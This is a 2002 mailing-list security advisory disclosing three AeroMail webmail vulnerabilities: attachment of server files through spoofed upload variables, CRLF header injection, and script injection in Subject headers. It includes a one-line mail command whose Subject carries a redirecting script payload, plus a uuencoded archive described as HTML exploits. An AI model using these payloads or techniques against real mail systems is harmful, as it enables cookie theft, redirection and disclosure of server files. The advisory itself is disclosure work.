AeroMail multiple vulnerabilities PROGRAM: AeroMail VENDOR: Mark Cushman (markat_private) HOMEPAGE: http://the.cushman.net/projects/aeromail/ MIRROR: http://www.packetplay.com/projects/aeromail/ VULNERABLE VERSIONS: all versions below 1.45 SEVERITY: medium to high DESCRIPTION: "AeroMail is a Web-based email client written in PHP. It uses an IMAP server to read and store messages in one or more user-defined folders, and its features include HTTP authentication for login (no cookies), folder manipulation, support for sending and viewing attachments, inline image display, multilanguage support, and URL highlighting." (direct quote from the program's project page on Freshmeat) AeroMail is released under the terms of the GNU General Public License. It seems to have quite a few users. ISSUES: 1) When sending e-mails, you can trick the attachment subsystem into sending local files from the web server or remote files from URL's instead of uploaded files as it should. How is that possible? Well, after PHP has uploaded a file, it sets a few variables with information about it. One of them is the filename under which the uploaded file has been temporarily stored. It is important to check that this variable was set by uploading a file. It might also be normal POSTed data, in which case you end up with this problem. 2) You can add additional headers to outgoing e-mail messages by sending some normal data for the To or Cc or Subject fields, a CRLF and then another header with some data. (A lot of other programs allow this too. It's not just AeroMail.) This can be used for adding uuencoded attachments up in the headers with lines ending in CR instead of CRLF, as previously discussed here on Bugtraq. 3) JavaScript and HTML code is active, when Subject headers are displayed. This allows DOS attacks by redirecting, theft of cookies etc. Issues 1 and 2 require a valid user/password combination to be exploited, while issue 3 is open to anyone. The vendor was contacted with an explanation, two exploits and a patch on the 23rd of February. Version 1.45, which is not vulnerable to any of these issues, was released on the 27th of February. RECOMMENDATION: I recommend that all users upgrade to version 1.45 immediately. EXPLOITS: Here are HTML exploits for issues 1 and 2. They are distributed as a uuencoded, gzipped tar archive. Issue 3 doesn't need a special exploit - you just send an ordinary mail: mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \ metaurat_private < /dev/null // Ulf Harnhammar metaurat_private begin 644 aeromail_exploits.tar.gz M'XL("!9R@CP``V%E<F]M86EL7V5X<&QO:71S+G1A<@#M5FUOVS80]F?]BJL& M;"TPF[(MQYEG!VT<`PF0-Z0.VGT*:(FVV$FB1E)QLU^_HR0G?EOL8AG:;GP` M03B2]\KCW5$F14)Y?,<^9['@6I':B\/S?*_;Z>#?\[H'_LJ_0LWK^K[G=YM> MLU7#K^MW:]!Y>5,VD2M-)4`MCZ?/G]NQ_YV";MS_^DJS$>DD_B<ZO*;G'?C^ MW]U_J]-NK]U_%]=JX+V4D\_A?W[__5<G5\/Q;]<C.!U?G,/U[?'YV1#<.B$? MVD-"3L8GY8;?\)HPEC157'.1TIB0T:7KN)'668^0^7S>F+<;0L[(^(:8A/%) M+(1BC5"'[I'3-TOFQVB(/\UUS([>8:9=8*;!J,PT:/9)N>/T$Z8I&.%U]D?. M[P?N4*2:I;H^?LB8"T%)#5S-/NM"WZ\01%0JI@=<B?KA8>>7>M,H)J5*IS\1 MX0-,9H&(A1RX/TP+N&`$(%FFH@LQ3W]?(NDJ[=ROTL:CYE8_<!EU3H5,`%V) M1#APKZ_>CU%B8.(W6`[</<>UI!&(Y/'Q$<72\"YA2M$9:V11AJH^2*[1:9@\ M0!]C(]ETX)JS6O1,M'+Y-I,8EH+?"'./;N,IG/Y(<XR.3".:)%3V"3UR>`HM M?'>-?F:,Y&F6:]`85[2*AR%+74AIat_private=(W=,X1_+L\OCJHPN*_XF$<=X9 MBUY_(H]699B(+B1HL3C?08;BK#,,=C`%P2;3.ZUI$,'K>40U3'G,0$BXO3D' M+<#$ZLT.F;3@7Y*[<(HP'9",*C4/5W7=F:/PFIN`:Z9^AD]8*@"3CDE0PEPJ M3V>@C3U<P83/<$_DLV@_2PKI6\QI>?[AFAV&K7)<1VS%^3F/8Y@P"&@<LQ#0 M5G/BXNQBY)BT9U+M:8TAMEBS-2Y&R'Y2=?%6UZ4Z+LVRF`?4/`0B`LUT76G) M:+)0]#Z??&*!WJ%$E:<V<^487WK%:\Y3%%VQF!K@@A1SA>=-%8E5R8AU8G&T M$K*B%E4E7#^&9?'.<<EPFE=N.(@17Y2<HMA][=*^%W;W_]:_WO^[IN?;_O]5 M\$WU_]9_I/^WOJ?^?RDTZ\&)2'_2D$G4"*/+\>@&Z-1T.M-/8HJ-K^PGIL70 M]`'$M-A9U$SU@J/$6LDV$\2V@KW59>=C_;2PL][LP2F3#%!2T:V?=EH]0`V2 M@F&JW%(;Y?]Q2%DSQ\PFV\S!\A"]S;.0:M;(\X9:4MA>,H7"E,TA$7)IW^\] M;\HS45U,-5544Y&RY:#NY*RFD(K=^S+><F:H>+^,M1P,=HX#R_FQ.A.LW<KC M*+#M:C:?YU/L.TMWLTCUI]V#O5+%CAL6%A86%A86%A86%A86%A86%A86%A;? +'/X"S&R_G``H```` ` end
This archive was generated by hypermail 2b30 : Sun Mar 03 2002 - 13:05:10 PST